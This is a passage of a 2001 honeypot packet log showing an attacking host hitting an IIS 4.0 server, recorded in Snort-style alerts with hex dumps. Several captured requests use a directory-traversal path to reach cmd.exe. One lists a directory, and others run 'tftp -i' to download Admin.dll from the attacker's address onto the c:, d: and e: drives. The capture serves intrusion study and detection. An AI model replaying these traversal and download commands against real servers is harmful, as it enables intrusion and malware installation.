050 : 20 31 36 3A 30 35 3A 32 30 20 47 4D 54 0D 0A 43    16:05:20 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25569) [2001-09-18 10:21:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=47110 flags=0 offset=0 TTL=128 chksum=37268
TCP:  port=80 -> dport: 4070  flags=***A***F seq=552428
      ack=483904459 off=5 res=0 win=8663 urp=0 chksum=30202
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25570) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=49779 flags=0 offset=0 TTL=118 chksum=37159
TCP:  port=4070 -> dport: 80  flags=*****R** seq=483904459
      ack=0 off=5 res=0 win=0 urp=0 chksum=1491
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25571) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=50035 flags=0 offset=0 TTL=118 chksum=36899
TCP:  port=4144 -> dport: 80  flags=******S* seq=483905021
      ack=0 off=6 res=0 win=8192 urp=0 chksum=52124
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25572) [2001-09-18 10:21:40]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=47622 flags=0 offset=0 TTL=128 chksum=36752
TCP:  port=80 -> dport: 4144  flags=***A**S* seq=552724
      ack=483905022 off=6 res=0 win=8760 urp=0 chksum=23095
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25573) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=50291 flags=0 offset=0 TTL=118 chksum=53031
TCP:  port=4070 -> dport: 80  flags=*****R** seq=483904459
      ack=483904459 off=5 res=0 win=0 urp=0 chksum=7472
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25575) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=47220 flags=0 offset=0 TTL=119 chksum=39462
TCP:  port=4144 -> dport: 80  flags=***A**** seq=483905022
      ack=552725 off=5 res=0 win=8760 urp=0 chksum=29172
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25576) [2001-09-18 10:21:40]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=47476 flags=0 offset=0 TTL=119 chksum=39109
TCP:  port=4144 -> dport: 80  flags=***AP*** seq=483905022
      ack=552725 off=5 res=0 win=8760 urp=0 chksum=45567
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 25577) [2001-09-18 10:21:40]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=231 ID=51206 flags=0 offset=0 TTL=128 chksum=32981
TCP:  port=80 -> dport: 4144  flags=***AP*** seq=552725
      ack=483905119 off=5 res=0 win=8663 urp=0 chksum=9020
Payload:  length = 191

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F   .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65   ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30   : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 35 3A 32 31 20 47 4D 54 0D   01 16:05:21 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61   .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74   pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20   -stream..Volume 
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E   in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65   o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69    Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A      s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25578) [2001-09-18 10:21:40]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=403 ID=51462 flags=0 offset=0 TTL=128 chksum=32553
TCP:  port=80 -> dport: 4144  flags=***AP**F seq=552916
      ack=483905119 off=5 res=0 win=8663 urp=0 chksum=30915
Payload:  length = 363

000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A    Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31   ....09/18/01  11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52   :05a        <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39   >          ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20   /18/01  11:05a  
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20         <DIR>

070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30        ....09/18/0
080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20   1  11:04a       
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30   TFTP206..09/18/0
0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
0c0 : 20 20 20 20 20 20 20 20 20 20 37 2C 31 36 38 20             7,168 
0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30   TFTP222..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20   TFTP84..        
110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29          5 File(s)
120 : 20 20 20 20 20 20 20 20 31 32 31 2C 38 35 36 20           121,856 
130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20   bytes..         
140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
150 : 20 32 2C 31 30 30 2C 36 31 36 2C 37 30 34 20 62    2,100,616,704 b
160 : 79 74 65 73 20 66 72 65 65 0D 0A                  ytes free..
----------------------------------------------------------------------------
--
#(2 - 25579) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=57460 flags=0 offset=0 TTL=118 chksum=29478
TCP:  port=4144 -> dport: 80  flags=*****R** seq=483905119
      ack=0 off=5 res=0 win=0 urp=0 chksum=757
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25580) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=57716 flags=0 offset=0 TTL=118 chksum=29218
TCP:  port=4381 -> dport: 80  flags=******S* seq=483907846
      ack=0 off=6 res=0 win=8192 urp=0 chksum=49062
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25581) [2001-09-18 10:21:40]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=51718 flags=0 offset=0 TTL=128 chksum=32656
TCP:  port=80 -> dport: 4381  flags=***A**S* seq=553485
      ack=483907847 off=6 res=0 win=8760 urp=0 chksum=19272
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25582) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=57972 flags=0 offset=0 TTL=118 chksum=45350
TCP:  port=4144 -> dport: 80  flags=*****R** seq=483905119
      ack=483905119 off=5 res=0 win=0 urp=0 chksum=6078
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25583) [2001-09-18 10:21:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=61044 flags=0 offset=0 TTL=119 chksum=25638
TCP:  port=4381 -> dport: 80  flags=***A**** seq=483907847
      ack=553486 off=5 res=0 win=8760 urp=0 chksum=25349
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25584) [2001-09-18 10:21:40]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=192 ID=61300 flags=0 offset=0 TTL=119 chksum=25230
TCP:  port=4381 -> dport: 80  flags=***AP*** seq=483907847
      ack=553486 off=5 res=0 win=8760 urp=0 chksum=26684
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A   c:\Admin.dll 0c:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25585) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=52486 flags=0 offset=0 TTL=128 chksum=31537
TCP:  port=80 -> dport: 4381  flags=***AP*** seq=553486
      ack=483907999 off=5 res=0 win=8608 urp=0 chksum=63688
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74   :05:21 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25586) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=52742 flags=0 offset=0 TTL=128 chksum=31636
TCP:  port=80 -> dport: 4381  flags=***A***F seq=553841
      ack=483907999 off=5 res=0 win=8608 urp=0 chksum=24993
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25587) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=1397 flags=0 offset=0 TTL=118 chksum=20006
TCP:  port=4381 -> dport: 80  flags=*****R** seq=483907999
      ack=2622773535 off=5 res=0 win=0 urp=0 chksum=340
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25588) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=1653 flags=0 offset=0 TTL=118 chksum=19746
TCP:  port=4392 -> dport: 80  flags=******S* seq=483907905
      ack=0 off=6 res=0 win=8192 urp=0 chksum=48992
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25589) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=52998 flags=0 offset=0 TTL=128 chksum=31376
TCP:  port=80 -> dport: 4392  flags=***A**S* seq=553766
      ack=483907906 off=6 res=0 win=8760 urp=0 chksum=18921
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25590) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=1909 flags=0 offset=0 TTL=118 chksum=35878
TCP:  port=4381 -> dport: 80  flags=*****R** seq=483907999
      ack=483907999 off=5 res=0 win=0 urp=0 chksum=81
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25591) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=8053 flags=0 offset=0 TTL=119 chksum=13094
TCP:  port=4392 -> dport: 80  flags=***A**** seq=483907906
      ack=553767 off=5 res=0 win=8760 urp=0 chksum=24998
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25592) [2001-09-18 10:21:41]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=192 ID=8309 flags=0 offset=0 TTL=119 chksum=12686
TCP:  port=4392 -> dport: 80  flags=***AP*** seq=483907906
      ack=553767 off=5 res=0 win=8760 urp=0 chksum=26077
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A   d:\Admin.dll 0d:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25593) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=53510 flags=0 offset=0 TTL=128 chksum=30513
TCP:  port=80 -> dport: 4392  flags=***AP*** seq=553767
      ack=483908058 off=5 res=0 win=8608 urp=0 chksum=63337
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74   :05:21 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25594) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=53766 flags=0 offset=0 TTL=128 chksum=30612
TCP:  port=80 -> dport: 4392  flags=***A***F seq=554122
      ack=483908058 off=5 res=0 win=8608 urp=0 chksum=24642
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25595) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=18805 flags=0 offset=0 TTL=118 chksum=2598
TCP:  port=4392 -> dport: 80  flags=*****R** seq=483908058
      ack=0 off=5 res=0 win=0 urp=0 chksum=63105
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25596) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=19061 flags=0 offset=0 TTL=118 chksum=2338
TCP:  port=4419 -> dport: 80  flags=******S* seq=483908121
      ack=0 off=6 res=0 win=8192 urp=0 chksum=48749
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25597) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=55302 flags=0 offset=0 TTL=128 chksum=29072
TCP:  port=80 -> dport: 4419  flags=***A**S* seq=554266
      ack=483908122 off=6 res=0 win=8760 urp=0 chksum=18178
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25598) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=19317 flags=0 offset=0 TTL=118 chksum=18470
TCP:  port=4392 -> dport: 80  flags=*****R** seq=483908058
      ack=483908058 off=5 res=0 win=0 urp=0 chksum=65487
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25599) [2001-09-18 10:21:41]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=28533 flags=0 offset=0 TTL=119 chksum=58149
TCP:  port=4419 -> dport: 80  flags=***A**** seq=483908122
      ack=554267 off=5 res=0 win=8760 urp=0 chksum=24255
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25600) [2001-09-18 10:21:41]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=192 ID=28789 flags=0 offset=0 TTL=119 chksum=57741
TCP:  port=4419 -> dport: 80  flags=***AP*** seq=483908122
      ack=554267 off=5 res=0 win=8760 urp=0 chksum=25078
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A   e:\Admin.dll 0e:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25601) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=57862 flags=0 offset=0 TTL=128 chksum=26161
TCP:  port=80 -> dport: 4419  flags=***AP*** seq=554267
      ack=483908274 off=5 res=0 win=8608 urp=0 chksum=62593
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 32 32 20 47 4D 54 0D 0A 43 6F 6E 74   :05:22 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25602) [2001-09-18 10:21:41]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=58118 flags=0 offset=0 TTL=128 chksum=26260
TCP:  port=80 -> dport: 4419  flags=***A***F seq=554622
